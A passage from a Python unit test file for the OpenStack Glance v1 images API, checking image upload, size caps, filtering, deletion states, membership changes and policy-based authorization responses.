self.assertTrue(\'x-image-meta-property-key2\' in res.headers,\n ""Did not find required property in headers. ""\n ""Got headers: %r"" % res.headers)\n self.assertTrue(\'x-image-meta-property-key3\' in res.headers,\n ""Did not find required property in headers. 
""\n ""Got headers: %r"" % res.headers)\n\n def test_publicize_image_unauthorized(self):\n """"""Create a non-public image then fail to make public""""""\n rules = {""add_image"": \'@\', ""publicize_image"": \'!\'}\n self.set_policy_rules(rules)\n\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-is-public\': \'false\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'PUT\'\n req.headers[\'x-image-meta-is-public\'] = \'true\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_update_image_size_header_too_big(self):\n """"""Tests raises BadRequest for supplied image size that is too big""""""\n fixture_headers = {\'x-image-meta-size\': CONF.image_size_cap + 1}\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'PUT\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_update_image_size_data_too_big(self):\n self.config(image_size_cap=512)\n\n fixture_headers = {\'content-type\': \'application/octet-stream\'}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'PUT\'\n\n req.body = \'X\' * (CONF.image_size_cap + 1)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_update_image_size_chunked_data_too_big(self):\n self.config(image_size_cap=512)\n\n # Create new image that has no data\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n req.headers[\'x-image-meta-name\'] = \'something\'\n req.headers[\'x-image-meta-container_format\'] = \'ami\'\n req.headers[\'x-image-meta-disk_format\'] = \'ami\'\n res = req.get_response(self.api)\n image_id = json.loads(res.body)[\'image\'][\'id\']\n\n fixture_headers = {\n \'content-type\': \'application/octet-stream\',\n \'transfer-encoding\': \'chunked\',\n }\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n\n req.body_file = StringIO.StringIO(\'X\' * (CONF.image_size_cap + 1))\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n def test_update_non_existing_image(self):\n self.config(image_size_cap=100)\n\n req = webob.Request.blank(""/images/%s"" % _gen_uuid())\n req.method = \'PUT\'\n req.body = \'test\'\n req.headers[\'x-image-meta-name\'] = \'test\'\n req.headers[\'x-image-meta-container_format\'] = \'ami\'\n req.headers[\'x-image-meta-disk_format\'] = \'ami\'\n req.headers[\'x-image-meta-is_public\'] = \'False\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 404)\n\n def test_update_public_image(self):\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-is-public\': \'true\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n 
self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'PUT\'\n req.headers[\'x-image-meta-name\'] = \'updated public image\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n def test_get_index_sort_name_asc(self):\n """"""\n Tests that the /images registry API returns list of\n public images sorted alphabetically by name in\n ascending order.\n """"""\n UUID3 = _gen_uuid()\n extra_fixture = {\'id\': UUID3,\n \'status\': \'active\',\n \'is_public\': True,\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'name\': \'asdf\',\n \'size\': 19,\n \'checksum\': None}\n\n db_api.image_create(self.context, extra_fixture)\n\n UUID4 = _gen_uuid()\n extra_fixture = {\'id\': UUID4,\n \'status\': \'active\',\n \'is_public\': True,\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'name\': \'xyz\',\n \'size\': 20,\n \'checksum\': None}\n\n db_api.image_create(self.context, extra_fixture)\n\n req = webob.Request.blank(\'/images?sort_key=name&sort_dir=asc\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n\n images = res_dict[\'images\']\n self.assertEquals(len(images), 3)\n self.assertEquals(images[0][\'id\'], UUID3)\n self.assertEquals(images[1][\'id\'], UUID2)\n self.assertEquals(images[2][\'id\'], UUID4)\n\n def test_get_details_filter_changes_since(self):\n """"""\n Tests that the /images/detail registry API returns list of\n public images filtered by the changes-since parameter\n """"""\n dt1 = timeutils.utcnow() - datetime.timedelta(1)\n iso1 = timeutils.isotime(dt1)\n\n date_only1 = dt1.strftime(\'%Y-%m-%d\')\n date_only2 = dt1.strftime(\'%Y%m%d\')\n date_only3 = dt1.strftime(\'%Y-%m%d\')\n\n dt2 = timeutils.utcnow() + datetime.timedelta(1)\n iso2 = timeutils.isotime(dt2)\n\n image_ts = timeutils.utcnow() + datetime.timedelta(2)\n hour_before = image_ts.strftime(\'%Y-%m-%dT%H:%M:%S%%2B01:00\')\n hour_after = image_ts.strftime(\'%Y-%m-%dT%H:%M:%S-01:00\')\n\n dt4 = timeutils.utcnow() + datetime.timedelta(3)\n iso4 = timeutils.isotime(dt4)\n\n UUID3 = _gen_uuid()\n extra_fixture = {\'id\': UUID3,\n \'status\': \'active\',\n \'is_public\': True,\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'name\': \'fake image #3\',\n \'size\': 18,\n \'checksum\': None}\n\n db_api.image_create(self.context, extra_fixture)\n db_api.image_destroy(self.context, UUID3)\n\n UUID4 = _gen_uuid()\n extra_fixture = {\'id\': UUID4,\n \'status\': \'active\',\n \'is_public\': True,\n \'disk_format\': \'ami\',\n \'container_format\': \'ami\',\n \'name\': \'fake image #4\',\n \'size\': 20,\n \'checksum\': None,\n \'created_at\': image_ts,\n \'updated_at\': image_ts}\n\n db_api.image_create(self.context, extra_fixture)\n\n # Check a standard list, 4 images in db (2 deleted)\n req = webob.Request.blank(\'/images/detail\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 2)\n self.assertEqual(images[0][\'id\'], UUID4)\n self.assertEqual(images[1][\'id\'], UUID2)\n\n # Expect 3 images (1 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' % iso1)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 3)\n 
self.assertEqual(images[0][\'id\'], UUID4)\n self.assertEqual(images[1][\'id\'], UUID3) # deleted\n self.assertEqual(images[2][\'id\'], UUID2)\n\n # Expect 1 image (0 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' % iso2)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 1)\n self.assertEqual(images[0][\'id\'], UUID4)\n\n # Expect 1 image (0 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' %\n hour_before)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 1)\n self.assertEqual(images[0][\'id\'], UUID4)\n\n # Expect 0 images (0 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' %\n hour_after)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 0)\n\n # Expect 0 images (0 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' % iso4)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 0)\n\n for param in [date_only1, date_only2, date_only3]:\n # Expect 3 images (1 deleted)\n req = webob.Request.blank(\'/images/detail?changes-since=%s\' %\n param)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n images = res_dict[\'images\']\n self.assertEquals(len(images), 3)\n self.assertEqual(images[0][\'id\'], UUID4)\n self.assertEqual(images[1][\'id\'], UUID3) # deleted\n self.assertEqual(images[2][\'id\'], UUID2)\n\n # Bad request (empty changes-since param)\n req = webob.Request.blank(\'/images/detail?changes-since=\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_get_images_bad_urls(self):\n """"""Check that routes collections are not on (LP bug 1185828)""""""\n req = webob.Request.blank(\'/images/detail.xxx\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n req = webob.Request.blank(\'/images.xxx\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n req = webob.Request.blank(\'/images/new\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n req = webob.Request.blank(""/images/%s/members"" % UUID1)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(""/images/%s/members.xxx"" % UUID1)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_get_images_detailed_unauthorized(self):\n rules = {""get_images"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(\'/images/detail\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_get_images_unauthorized(self):\n rules = {""get_images"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(\'/images/detail\')\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_store_location_not_revealed(self):\n """"""\n Test that the internal store location is NOT revealed\n through the API server\n """"""\n # Check index and details...\n for url in (\'/images\', \'/images/detail\'):\n req = 
webob.Request.blank(url)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n res_dict = json.loads(res.body)\n\n images = res_dict[\'images\']\n num_locations = sum([1 for record in images\n if \'location\' in record.keys()])\n self.assertEquals(0, num_locations, images)\n\n # Check GET\n req = webob.Request.blank(""/images/%s"" % UUID2)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertFalse(\'X-Image-Meta-Location\' in res.headers)\n\n # Check HEAD\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertFalse(\'X-Image-Meta-Location\' in res.headers)\n\n # Check PUT\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.body = res.body\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n res_body = json.loads(res.body)\n self.assertFalse(\'location\' in res_body[\'image\'])\n\n # Check POST\n req = webob.Request.blank(""/images"")\n headers = {\'x-image-meta-location\': \'http://localhost\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n for k, v in headers.iteritems():\n req.headers[k] = v\n req.method = \'POST\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 201)\n res_body = json.loads(res.body)\n self.assertFalse(\'location\' in res_body[\'image\'])\n\n def test_image_is_checksummed(self):\n """"""Test that the image contents are checksummed properly""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n image_contents = ""chunk00000remainder""\n image_checksum = hashlib.md5(image_contents).hexdigest()\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = image_contents\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(image_checksum, res_body[\'checksum\'],\n ""Mismatched checksum. 
Expected %s, got %s"" %\n (image_checksum, res_body[\'checksum\']))\n\n def test_etag_equals_checksum_header(self):\n """"""Test that the ETag header matches the x-image-meta-checksum""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n image_contents = ""chunk00000remainder""\n image_checksum = hashlib.md5(image_contents).hexdigest()\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = image_contents\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n image = json.loads(res.body)[\'image\']\n\n # HEAD the image and check the ETag equals the checksum header...\n expected_headers = {\'x-image-meta-checksum\': image_checksum,\n \'etag\': image_checksum}\n req = webob.Request.blank(""/images/%s"" % image[\'id\'])\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n for key in expected_headers.keys():\n self.assertTrue(key in res.headers,\n ""required header \'%s\' missing from ""\n ""returned headers"" % key)\n for key, value in expected_headers.iteritems():\n self.assertEquals(value, res.headers[key])\n\n def test_bad_checksum_prevents_image_creation(self):\n """"""Test that the image contents are checksummed properly""""""\n image_contents = ""chunk00000remainder""\n bad_checksum = hashlib.md5(""invalid"").hexdigest()\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-checksum\': bad_checksum,\n \'x-image-meta-is-public\': \'true\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = image_contents\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n # Test that only one image was returned (that already exists)\n req = webob.Request.blank(""/images"")\n req.method = \'GET\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n images = json.loads(res.body)[\'images\']\n self.assertEqual(len(images), 1)\n\n def test_image_meta(self):\n """"""Test for HEAD /images/""""""\n expected_headers = {\'x-image-meta-id\': UUID2,\n \'x-image-meta-name\': \'fake image #2\'}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n for key, value in expected_headers.iteritems():\n self.assertEquals(value, res.headers[key])\n\n def test_image_meta_unauthorized(self):\n rules = {""get_image"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_show_image_basic(self):\n req = webob.Request.blank(""/images/%s"" % UUID2)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertEqual(res.content_type, \'application/octet-stream\')\n self.assertEqual(\'chunk00000remainder\', res.body)\n\n def test_show_non_exists_image(self):\n req = webob.Request.blank(""/images/%s"" % _gen_uuid())\n res = 
req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_show_image_unauthorized(self):\n rules = {""get_image"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 403)\n\n def test_show_image_unauthorized_download(self):\n rules = {""download_image"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 403)\n\n def test_delete_image(self):\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(res.body, \'\')\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404,\n res.body)\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(res.headers[\'x-image-meta-deleted\'], \'True\')\n self.assertEquals(res.headers[\'x-image-meta-status\'], \'deleted\')\n\n def test_delete_non_exists_image(self):\n req = webob.Request.blank(""/images/%s"" % _gen_uuid())\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_delete_not_allowed(self):\n # Verify we can get the image data\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.headers[\'X-Auth-Token\'] = \'user:tenant:\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertEqual(len(res.body), 19)\n\n # Verify we cannot delete the image\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 403)\n\n # Verify the image data is still there\n req.method = \'GET\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertEqual(len(res.body), 19)\n\n def test_delete_queued_image(self):\n """"""Delete an image in a queued state\n\n Bug #747799 demonstrated that trying to DELETE an image\n that had had its save process killed manually results in failure\n because the location attribute is None.\n\n Bug #1048851 demonstrated that the status was not properly\n being updated to \'deleted\' from \'queued\'.\n """"""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n\n # Now try to delete the image...\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s\' % res_body[\'id\'])\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(res.headers[\'x-image-meta-deleted\'], \'True\')\n self.assertEquals(res.headers[\'x-image-meta-status\'], \'deleted\')\n\n def test_delete_queued_image_delayed_delete(self):\n """"""Delete an image in a queued state when 
delayed_delete is on\n\n Bug #1048851 demonstrated that the status was not properly\n being updated to \'deleted\' from \'queued\'.\n """"""\n self.config(delayed_delete=True)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n\n # Now try to delete the image...\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s\' % res_body[\'id\'])\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(res.headers[\'x-image-meta-deleted\'], \'True\')\n self.assertEquals(res.headers[\'x-image-meta-status\'], \'deleted\')\n\n def test_delete_protected_image(self):\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-protected\': \'True\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n\n # Now try to delete the image...\n req = webob.Request.blank(""/images/%s"" % res_body[\'id\'])\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_delete_image_unauthorized(self):\n rules = {""delete_image"": \'!\'}\n self.set_policy_rules(rules)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_get_details_invalid_marker(self):\n """"""\n Tests that the /images/detail registry API returns a 400\n when an invalid marker is provided\n """"""\n req = webob.Request.blank(\'/images/detail?marker=%s\' % _gen_uuid())\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_get_image_members(self):\n """"""\n Tests members listing for existing images\n """"""\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n memb_list = json.loads(res.body)\n num_members = len(memb_list[\'members\'])\n self.assertEquals(num_members, 0)\n\n def test_get_image_members_allowed_by_policy(self):\n rules = {""get_members"": \'@\'}\n self.set_policy_rules(rules)\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n memb_list = json.loads(res.body)\n num_members = len(memb_list[\'members\'])\n self.assertEquals(num_members, 0)\n\n def test_get_image_members_forbidden_by_policy(self):\n rules = {""get_members"": \'!\'}\n self.set_policy_rules(rules)\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'GET\'\n\n res = 
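The queued-image tests pin down the soft-delete contract: DELETE succeeds even for an image whose upload never finished, after which GET returns 404 while HEAD still answers 200 with `x-image-meta-deleted: True` and `x-image-meta-status: deleted`. A toy model of that transition (illustrative names, not Glance internals):

```python
class ImageRecord(object):
    """Toy soft-delete model matching what the tests assert."""

    def __init__(self):
        self.status = 'queued'   # no data stored yet, location is None
        self.deleted = False

    def delete(self):
        # Must not depend on a location being set (bug #747799) and
        # must move the status to 'deleted' (bug #1048851).
        self.deleted = True
        self.status = 'deleted'

img = ImageRecord()
img.delete()
assert (img.deleted, img.status) == (True, 'deleted')
```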
req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)\n\n def test_get_image_members_not_existing(self):\n """"""\n Tests proper exception is raised if attempt to get members of\n non-existing image\n """"""\n req = webob.Request.blank(\'/images/%s/members\' % _gen_uuid())\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_add_member(self):\n """"""\n Tests adding image members\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/test\' % UUID2)\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_get_member_images(self):\n """"""\n Tests image listing for members\n """"""\n req = webob.Request.blank(\'/shared-images/pattieblack\')\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n memb_list = json.loads(res.body)\n num_members = len(memb_list[\'shared_images\'])\n self.assertEquals(num_members, 0)\n\n def test_replace_members(self):\n """"""\n Tests replacing image members raises right exception\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=False)\n fixture = dict(member_id=\'pattieblack\')\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(image_memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 401)\n\n def test_active_image_immutable_props_for_user(self):\n """"""\n Tests user cannot update immutable props of active image\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=False)\n fixture_header_list = [{\'x-image-meta-checksum\': \'1234\'},\n {\'x-image-meta-size\': \'12345\'}]\n for fixture_header in fixture_header_list:\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'PUT\'\n for k, v in fixture_header.iteritems():\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n orig_value = res.headers[k]\n\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.headers[k] = v\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n prop = k[len(\'x-image-meta-\'):]\n self.assertNotEqual(res.body.find(""Forbidden to modify \\\'%s\\\' ""\n ""of active ""\n ""image"" % prop), -1)\n\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(orig_value, res.headers[k])\n\n def test_props_of_active_image_mutable_for_admin(self):\n """"""\n Tests admin can update \'immutable\' props of active image\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=True)\n fixture_header_list = [{\'x-image-meta-checksum\': \'1234\'},\n {\'x-image-meta-size\': \'12345\'}]\n for fixture_header in fixture_header_list:\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'PUT\'\n for k, v in fixture_header.iteritems():\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'HEAD\'\n res = 
req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n orig_value = res.headers[k]\n\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.headers[k] = v\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(v, res.headers[k])\n\n def test_replace_members_non_existing_image(self):\n """"""\n Tests replacing image members raises right exception\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=True)\n fixture = dict(member_id=\'pattieblack\')\n req = webob.Request.blank(\'/images/%s/members\' % _gen_uuid())\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(image_memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_replace_members_bad_request(self):\n """"""\n Tests replacing image members raises bad request if body is wrong\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=True)\n fixture = dict(member_id=\'pattieblack\')\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(image_memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_replace_members_positive(self):\n """"""\n Tests replacing image members\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n\n fixture = [dict(member_id=\'pattieblack\', can_share=False)]\n # Replace\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(memberships=fixture))\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n def test_replace_members_forbidden_by_policy(self):\n rules = {""modify_member"": \'!\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n fixture = [{\'member_id\': \'pattieblack\', \'can_share\': \'false\'}]\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID1)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)\n\n def test_replace_members_allowed_by_policy(self):\n rules = {""modify_member"": \'@\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n fixture = [{\'member_id\': \'pattieblack\', \'can_share\': \'false\'}]\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID1)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n\n def test_add_member(self):\n """"""\n Tests adding image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=False)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = 
